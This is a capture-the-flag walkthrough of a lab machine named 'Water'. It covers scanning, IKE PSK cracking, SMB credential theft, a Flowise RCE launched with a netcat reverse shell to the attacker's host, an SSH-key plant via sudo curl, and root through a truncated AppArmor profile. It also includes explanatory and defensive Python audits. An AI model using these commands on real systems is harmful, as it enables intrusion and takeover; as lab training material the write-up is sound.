Walkthrough of Water, a target machine shared by a group member
nmap -p- 192.168.5.22
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-15 18:50 EST
Nmap scan report for 192.168.5.22 (192.168.5.22)
Host is up (0.00042s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3000/tcp open ppp
MAC Address: 08:00:27:A7:98:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Port 80 serves a static page; port 3000 has an admin page that requires a login.
It is a Flowise web application. Running gobuster against port 80 turned up nothing. A search showed plenty of CVEs, but none of them seemed to work, and there is no unauthenticated access either. It felt like the first step had to be obtaining an email address to log in with.
Running smbmap revealed a share named public, but I could not log in to it.
That meant the enumeration had not been thorough enough.
Running enum4linux -a 192.168.5.22 to enumerate users showed two accounts: 111 and hungry.
UDP still has to be scanned as well. Scan the 20 most common UDP ports:
nmap 192.168.5.22 -sU --top-ports 20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-17 10:38 EST
Nmap scan report for 192.168.5.22 (192.168.5.22)
Host is up (0.00070s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp open isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 08:00:27:A7:98:72 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Port 500, isakmp, stands out.
Following HackTricks, ike-scan -P -M -A -n fakeID 192.168.5.22 returned a hash in the response, which shows the approach is viable (aggressive mode hands the initiator the responder's PSK-keyed hash before the initiator has authenticated). Whichever ID is supplied, cracking the returned hash gives the same result.
psk-crack -d /usr/share/wordlists/rockyou.txt hash.txt
Starting psk-crack [ike-scan 1.9.6] (http://www.nta-monitor.com/tools/ike-scan/)
Running in dictionary cracking mode
key "dodgers125" matches SHA1 hash 6d920ad11b3af79596d3fb83e36e440c20e25977
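Why the recovered key is independent of the ID supplied with -n: in IKEv1 aggressive mode (RFC 2409) the responder computes SKEYID = prf(PSK, Ni_b | Nr_b) and sends HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b) in the clear, and every input except the PSK is visible on the wire; the initiator's claimed identity is not among them at all. The following is an added Python model of that derivation, not code from the writeup or from ike-scan/psk-crack. All field values (nonces, cookies, DH values, SA body, responder ID, the PSK) are constructed; the prf is HMAC-SHA1 because that is what the box negotiated.

```python
import hmac
import hashlib
from dataclasses import dataclass


@dataclass
class AggressiveExchange:
    """Fields of one IKEv1 aggressive-mode exchange (RFC 2409 section 5.4) as
    seen on the wire.  Constructed stand-ins, not values captured from Water."""
    ni_b: bytes     # initiator nonce
    nr_b: bytes     # responder nonce
    g_xi: bytes     # initiator Diffie-Hellman public value
    g_xr: bytes     # responder Diffie-Hellman public value
    cky_i: bytes    # initiator cookie (ISAKMP header)
    cky_r: bytes    # responder cookie
    sai_b: bytes    # body of the initiator's SA payload
    idir_b: bytes   # body of the responder's ID payload
    hash_r: bytes   # HASH_R exactly as the responder sent it, unencrypted


def prf(key: bytes, data: bytes) -> bytes:
    # The negotiated prf is HMAC over the negotiated hash; the box used SHA1.
    return hmac.new(key, data, hashlib.sha1).digest()


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    # Pre-shared-key authentication: SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
    return prf(psk, ni_b + nr_b)


def hash_r(psk: bytes, x: AggressiveExchange) -> bytes:
    # HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    skeyid = skeyid_psk(psk, x.ni_b, x.nr_b)
    return prf(skeyid, x.g_xr + x.g_xi + x.cky_r + x.cky_i + x.sai_b + x.idir_b)


def psk_matches(candidate: bytes, x: AggressiveExchange) -> bool:
    """Offline check of one PSK candidate against an observed exchange.  This is
    the single step psk-crack repeats over a wordlist; it is possible only
    because every other input to HASH_R was sent in the clear."""
    return hmac.compare_digest(hash_r(candidate, x), x.hash_r)


def simulated_responder(psk: bytes, idii_b: bytes, ni_b: bytes, nr_b: bytes) -> AggressiveExchange:
    """Gateway side of the exchange, deterministic so results can be asserted.

    idii_b is the identity the initiator claims (ike-scan's -n fakeID).  A real
    responder uses it in HASH_I, the value it checks; it never enters HASH_R,
    the value it sends, so the sent hash is keyed by the PSK alone.  Cookies,
    DH values, SA body and responder ID below are constructed constants.
    """
    _ = idii_b  # accepted from the peer, deliberately unused in HASH_R
    x = AggressiveExchange(
        ni_b=ni_b, nr_b=nr_b,
        g_xi=b"\x11" * 32, g_xr=b"\x22" * 32,
        cky_i=b"\x01" * 8, cky_r=b"\x02" * 8,
        sai_b=b"\x00\x00\x00\x01" + b"\x03" * 28,
        idir_b=b"\x01\x00\x00\x00" + bytes([192, 168, 5, 22]),  # ID_IPV4_ADDR, constructed
        hash_r=b"",
    )
    x.hash_r = hash_r(psk, x)
    return x


def demo(psk: bytes = b"constructed-psk") -> dict:
    """Two probes with different claimed IDs and fresh nonces: the two hashes
    differ, yet one PSK verifies both and a wrong PSK verifies neither."""
    run1 = simulated_responder(psk, b"fakeID", b"\xaa" * 20, b"\xbb" * 20)
    run2 = simulated_responder(psk, b"anotherID", b"\xcc" * 20, b"\xdd" * 20)
    return {
        "hashes_differ": run1.hash_r != run2.hash_r,
        "same_psk_matches_both": psk_matches(psk, run1) and psk_matches(psk, run2),
        "wrong_psk_rejected": not (psk_matches(b"wrong", run1) or psk_matches(b"wrong", run2)),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The hash itself changes from probe to probe because the nonces and cookies do, which is why each ike-scan run shows a different value while psk-crack lands on the same key. The exposure is a property of aggressive mode with PSK, so the fix is on the gateway side: IKEv2 or certificate-based authentication, and no aggressive-mode PSK proposals accepted from unknown peers.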
Try an SMB login: smbclient //192.168.5.22/public -U 111
get noo0ootes.txt retrieves a credential pair: admin / Drinkw@terisg00d. Logging in with admin@water.dsz (which can be considered a reasonable guess) succeeds.
The instance turns out to be version 3.0.4, which has an RCE. The exploit script is slightly off; a small tweak fixes it.
python3 flowiseRCE.py --email admin@water.dsz --password Drinkw@terisg00d --url http://192.168.5.22:3000 --cmd "busybox nc 192.168.5.21 6666 -e sh"
Catch the reverse shell, stabilize it, and we have the 111 user's privileges. flag{user-Still-waters-run-deep}. Next, move laterally to Hungry. The step is the curl command via sudo. One option is to fuzz for files under Hungry's home and read them, for example sudo -u Hungry curl file:///home/Hungry/passwd.txt; the other is to write an SSH public key. Personally I think writing the public key is the more generally applicable method.
sudo -u Hungry curl http://192.168.5.21/id_rsa.pub -o /home/Hungry/.ssh/authorized_keys --create-dirs
Successfully pivoted to the Hungry user.
Hungry@Water:~$ id
uid=1000(Hungry) gid=1000(Hungry) groups=1000(Hungry)
Hungry@Water:~$ ls
passwd.txt
Hungry@Water:~$ cat passwd.txt
好好学习天天向上
Hungry@Water:~$ sudo -l
Matching Defaults entries for Hungry on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hungry may run the following commands on localhost:
(ALL) NOPASSWD: /usr/games/my_pipes
This my_pipes does not appear to offer anything for escalation.
Look at binaries with the SUID bit set: find / -perm -4000 2>/dev/null.
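Both sudo rules met so far share one shape: a command that can read or create files as the target user (curl with file:// and -o for 111, and, as the end of the box shows, my_pipes -O for Hungry). The following is an added Python audit of sudo -l output, not a tool from the writeup: it parses the rule lines, flags well-known file-capable binaries, NOPASSWD tags and custom binaries outside the system directories. The Hungry sample is the output shown on this page; the 111 sample is constructed from what its sudo -u Hungry curl implies (the writeup never shows 111's sudo -l, and NOPASSWD there is an assumption).

```python
import re
from dataclasses import dataclass, field

# One rule line of `sudo -l` output: "(runas) TAG: TAG: /path/cmd args, /path/other"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")

# Binaries whose ordinary options read or write arbitrary paths as the target user.
# The writeup used both curl behaviours: file:// to read passwd.txt, -o to drop a key.
FILE_CAPABLE = {
    "curl": "file:// reads any file, -o --create-dirs writes any path",
    "wget": "-O writes any path, --post-file sends any file out",
    "tee": "writes stdin to any path",
    "cp": "overwrites any path",
    "dd": "reads and writes any path",
}
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")

# Output shown earlier on this page for the Hungry user.
SUDO_L_HUNGRY = r"""Matching Defaults entries for Hungry on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User Hungry may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/games/my_pipes
"""

# Constructed: the writeup does not show 111's sudo -l; this is the minimum
# its `sudo -u Hungry curl ...` implies, with NOPASSWD assumed.
SUDO_L_111_CONSTRUCTED = """User 111 may run the following commands on localhost:
    (Hungry) NOPASSWD: /usr/bin/curl
"""


@dataclass
class Finding:
    runas: str
    binary: str
    nopasswd: bool
    reasons: list = field(default_factory=list)


def audit_sudo_l(text: str) -> list:
    """Parse `sudo -l` output and return the rules that deserve a second look."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers, blanks
        runas = m.group("runas").split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        nopasswd = "NOPASSWD:" in m.group("tags")
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if not spec:
                continue
            binary = spec.split()[0]
            f = Finding(runas, binary, nopasswd)
            if binary == "ALL":
                f.reasons.append("unrestricted command set")
            name = binary.rsplit("/", 1)[-1]
            if name in FILE_CAPABLE:
                f.reasons.append(f"{name} as {runas}: {FILE_CAPABLE[name]}")
            if binary.startswith("/") and not binary.startswith(SYSTEM_DIRS):
                f.reasons.append("custom binary outside system directories: review every option "
                                 "that creates or truncates a file (my_pipes -O wrote an empty file as root)")
            if nopasswd:
                f.reasons.append("NOPASSWD: usable from any shell obtained as this user, no credential needed")
            if f.reasons:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for sample in (SUDO_L_HUNGRY, SUDO_L_111_CONSTRUCTED):
        for f in audit_sudo_l(sample):
            print(f"({f.runas}) {f.binary}")
            for r in f.reasons:
                print("   -", r)
```

The point of the custom-binary reason is the one this box makes later: a program nobody has heard of in /usr/games is not safer than curl, it is just unreviewed, and any output-file flag it accepts is a root-owned write.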
Hungry@Water:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/zsh
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
zsh stands out, however:
Hungry@Water:~$ zsh -p
zsh: error while loading shared libraries: libcap.so.2: cannot open shared object file: No such file or directory
Hungry@Water:~$ find / -name "libcap.so.2" 2>/dev/null
/usr/lib/x86_64-linux-gnu/libcap.so.2
The library exists, yet zsh cannot load it.
Force-load the library by invoking the dynamic loader directly:
Hungry@Water:~$ /lib64/ld-linux-x86-64.so.2 --library-path /usr/lib/x86_64-linux-gnu /usr/bin/zsh -p
Water% id
uid=1000(Hungry) gid=1000(Hungry) groups=1000(Hungry)
Done this way, the SUID privilege is gone: the kernel honours the setuid bit only on the file passed to execve, and here that file is the loader rather than zsh, so zsh runs with the caller's own uid. Running linpeas.sh, one AppArmor rule stands out:
Hungry@Water:~$ cat /etc/apparmor.d/usr.bin.zsh
#include <tunables/global>
/usr/bin/zsh {
# Deny all file access (libraries included), so the binary fails to start; capabilities and network are denied by default
deny /** rwlkxm,
}
So the idea is to clear this rule away.
Use the my_pipes option that creates an empty file to overwrite the profile:
sudo /usr/games/my_pipes -O /etc/apparmor.d/usr.bin.zsh
Then reboot the machine: the empty profile file defines no profile, so after the reload zsh runs unconfined and the setuid bit takes effect.
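Two defensive facts fall out of this stage: a setuid shell is an instant root shell unless something confines it, and the confinement here lived in a single file that a sudo-writable program could truncate to nothing, after which the next profile load silently dropped it. The following is an added Python audit, not code from the writeup or the box: it walks a filesystem root for setuid interpreters (the same selection find / -perm -4000 makes, narrowed to shells and scripting languages), maps each to the AppArmor profile file it would load by AppArmor's own naming convention (/usr/bin/zsh to usr.bin.zsh), and flags profile files that are missing, empty, or no longer define a profile. The directory layout and profile contents in build_demo_layout are constructed for the demonstration.

```python
import os
import stat
import tempfile
from dataclasses import dataclass

# Interpreters that hand the caller a full shell or scripting environment; with
# the setuid bit set, each is euid=0 unless something else confines it.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "ksh", "fish", "python", "python3", "perl", "ruby"}


@dataclass
class Finding:
    binary: str        # path as it would appear on the real system
    profile_file: str  # AppArmor profile file this binary maps to
    state: str         # "no-profile", "empty-profile" or "profile-present"
    note: str


def find_suid(root: str):
    """Yield setuid regular files under `root`, reported with `root` stripped so
    /tmp/x/usr/bin/zsh is reported as /usr/bin/zsh (like find / -perm -4000)."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield "/" + os.path.relpath(full, root)


def profile_state(binary: str, apparmor_dir: str):
    """AppArmor names profile files after the binary path with '/' turned into '.'."""
    profile_file = os.path.join(apparmor_dir, binary.lstrip("/").replace("/", "."))
    if not os.path.exists(profile_file):
        return profile_file, "no-profile"
    with open(profile_file, "r", errors="replace") as fh:
        body = fh.read()
    # A profile definition names the binary and opens a '{' block.  An empty or
    # gutted file parses as "no profiles", so the binary runs unconfined.
    if binary not in body or "{" not in body:
        return profile_file, "empty-profile"
    return profile_file, "profile-present"


NOTES = {
    "no-profile": "setuid interpreter with no AppArmor profile: runs as root unconfined",
    "empty-profile": "profile file is empty or defines no profile (truncated?): "
                     "confinement is gone after the next reload",
    "profile-present": "setuid interpreter: confinement depends on the profile body, review it",
}


def audit_suid_interpreters(root: str, apparmor_dir: str) -> list:
    findings = []
    for binary in sorted(find_suid(root)):
        if os.path.basename(binary) not in INTERPRETERS:
            continue
        profile_file, state = profile_state(binary, apparmor_dir)
        findings.append(Finding(binary, profile_file, state, NOTES[state]))
    return findings


def build_demo_layout():
    """Constructed throwaway filesystem: setuid zsh, bash and passwd under
    <root>/usr/bin, a 0-byte profile for zsh (what the writeup left behind) and
    an intact deny-all profile for bash.  Not taken from the Water box."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    root = os.path.join(base, "root")
    aa = os.path.join(base, "apparmor.d")
    os.makedirs(os.path.join(root, "usr", "bin"))
    os.makedirs(aa)
    for name in ("zsh", "bash", "passwd"):
        p = os.path.join(root, "usr", "bin", name)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(p, 0o4755)  # the owner may set the setuid bit on their own file
    open(os.path.join(aa, "usr.bin.zsh"), "w").close()  # 0-byte file, as after my_pipes -O
    with open(os.path.join(aa, "usr.bin.bash"), "w") as fh:
        fh.write("/usr/bin/bash {\n  deny /** rwlkxm,\n}\n")
    return root, aa


def demo() -> dict:
    root, aa = build_demo_layout()
    return {f.binary: f.state for f in audit_suid_interpreters(root, aa)}


if __name__ == "__main__":
    for f in audit_suid_interpreters(*build_demo_layout()):
        print(f"{f.binary:<16} {f.state:<16} {f.note}")
```

Run against a live system with audit_suid_interpreters("/", "/etc/apparmor.d"). passwd is setuid in the demo too, but it is not an interpreter and is correctly left out; the finding that matters is zsh, whose profile file still exists and therefore passes a naive "is the profile there" check while confining nothing.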
Hungry@Water:~$ /usr/bin/zsh -p
Water# id
uid=1000(Hungry) gid=1000(Hungry) euid=0(root) egid=0(root) groups=0(root),1000(Hungry)
Water# cat /root/root.txt
flag{root-A-drop-in-the-ocean}